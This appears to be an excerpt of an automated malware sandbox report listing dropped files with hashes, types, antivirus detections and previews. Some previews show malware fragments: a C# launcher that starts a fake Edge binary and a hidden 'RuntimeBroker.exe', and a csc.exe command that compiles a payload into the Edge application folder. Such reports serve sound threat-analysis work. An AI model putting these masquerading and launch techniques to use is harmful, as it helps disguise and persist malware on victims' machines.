                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):408
                                                                                  Entropy (8bit):4.985269740546796
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLu5j3iFkD:JNVQIbSfhWLzIiFkMSfh0jSFkD
                                                                                  MD5:622899BB563C17F8517CB53DE570729F
                                                                                  SHA1:0587BEED6042E86936E609C9EF239D8089FD46DC
                                                                                  SHA-256:94068D8CB2D5DA87C3AAEA2D07259F901FDB2E47426D8768B30C3C4007A52EB0
                                                                                  SHA-512:02B11AF585CECCE13B3DFD4534E78B2228B27DF3AB091E785DB9999C88BFF1EFB4F158CDB4D920F46051EF8F119A30421E34F75AED5CD54763B055C729D236B3
                                                                                  Malicious:false
                                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\LiveKernelReports\RuntimeBroker.exe"); } catch { } }).Start();. }.}.
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):268
                                                                                  Entropy (8bit):5.106435571346186
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fZMaQMNxn:Hu7L//TRRzscQnahwSx
                                                                                  MD5:352EAA4E8013920152C2F8D9B3F9A1E9
                                                                                  SHA1:11FC660AE48DBCD6892C87C684DA8174E0EB7F90
                                                                                  SHA-256:C3983440F70051BDD5F9BBDC1121C07D7E6ABB3A84182DABB35F25FF2BDCBAA1
                                                                                  SHA-512:5A43ED61517766AEC7866B9F05AB22E217F5749F5602984264C527579C670CEB3352A4B4DC46740C3296F0C867E17A9B5BDF64F3C20098053F984B441B4F2523
                                                                                  Malicious:true
                                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.0.cs"
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):771
                                                                                  Entropy (8bit):5.256422972153224
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:wMjI/un/VRzstnaFUKax5DqBVKVrdFAMBJTH:wMjN/VRzPFUK2DcVKdBJj
                                                                                  MD5:35CB11D1A9E6E689880DB32BB1784109
                                                                                  SHA1:4D61DF660A2DB681C81DE27FDC3B224D85C0CCC4
                                                                                  SHA-256:48BE6764DC62D5B9AAB4801CB4BC649F43585B25BE8B053DA0BF44A246CBDE0D
                                                                                  SHA-512:EAF953296BA76564F18E7573B4A3B7CC6ECEA44CF6BACA59C61254FB12B623B331440635E5A275CF5A891BC410DDBA6957ACF656B9C38B3649D5C3B753E983EB
                                                                                  Malicious:false
                                                                                  Preview:.C:\ServerWinRuntimeBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33792
                                                                                  Entropy (8bit):5.541771649974822
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: hz7DzW2Yop.exe, Detection: malicious
                                                                                  • Filename: 3XtEci4Mmo.exe, Detection: malicious
                                                                                  • Filename: wxl1r0lntg.exe, Detection: malicious
                                                                                  • Filename: HaLCYOFjMN.exe, Detection: malicious
                                                                                  • Filename: Z90Z9bYzPa.exe, Detection: malicious
                                                                                  • Filename: 0J5DzstGPi.exe, Detection: malicious
                                                                                  • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious
                                                                                  • Filename: aW6kSsgdvv.exe, Detection: malicious
                                                                                  • Filename: HMhdtzxEHf.exe, Detection: malicious
                                                                                  • Filename: kJrNOFEGbQ.exe, Detection: malicious
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):85504
                                                                                  Entropy (8bit):5.8769270258874755
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):5.932541123129161
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):33792
                                                                                  Entropy (8bit):5.541771649974822
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):23552
                                                                                  Entropy (8bit):5.519109060441589
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):85504
                                                                                  Entropy (8bit):5.8769270258874755
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):32256
                                                                                  Entropy (8bit):5.631194486392901
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):5.932541123129161
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):76
                                                                                  Entropy (8bit):5.366091329119195
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Hi1TUvQK1Nx01qhDdcoAx1XmaHLN6AUUqn:C1TUIkL3eoAPzHkSqn
                                                                                  MD5:0BBB88B51F8BB1F41C821814ADA2FBA5
                                                                                  SHA1:035DD7FD425F3A885B8723C2309AC6F7669CB9A8
                                                                                  SHA-256:DE8460304720B50CC9CE403C5E84DB85D4292EE8AAC76CFB6AAC75CBA3F88C9F
                                                                                  SHA-512:FB2718B06DB6828476274D2AC754C3EB26E56A6F7F925D9C39D2D7050BA45D96C0C265D0CAD39FA891874AA079BE11555E808B761B7FB5F4580110574EF61D0D
                                                                                  Malicious:false
                                                                                  Preview:2nFGW7gi6xqeqr3ktuXMKYwDZUKVHShKBIQPZODfWneb2yIp4PDc0T3e0BrCwLbnPfdhbnKeq1zg
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
